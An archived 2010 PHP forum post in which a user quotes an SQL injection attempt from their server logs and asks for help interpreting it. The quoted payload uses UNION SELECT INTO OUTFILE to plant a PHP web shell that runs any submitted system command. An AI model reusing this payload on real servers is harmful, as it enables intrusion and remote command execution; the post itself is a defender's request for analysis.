php_learner56 Posted November 9, 2010 Share Posted November 9, 2010 Hello all was reviewing my logs yesterday and found this. Its particularly interesting as my server is running Linux. Hoping to get some help interpreting it. "union select"<?php if (isset($_REQUEST['cmd'])){ echo '<pre>'; system ($_REQUEST['cmd']); echo '</pre>'; ?><form action=<?php echo basebane($_SERVER['PHP_SELF'])?>><input type=text name=cmd size=20><input type=submit></form>","","","","","" into outfile "/var/www/html/testfile.php"/* I'm fairly new to PHP but I believe the script does the following. It attempts to set the $_REQUEST variable as cmd. If it is sucessful it calls the cmd variable. It then pipes the information entered in the submission form into testfile.php and runs it? I don't understand what the echo"basename($_SERVER['PHP_SELF']) does though. Any help would be greatly appreciated. Link to comment https://forums.phpfreaks.com/topic/218209-security-related-log-file/ Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.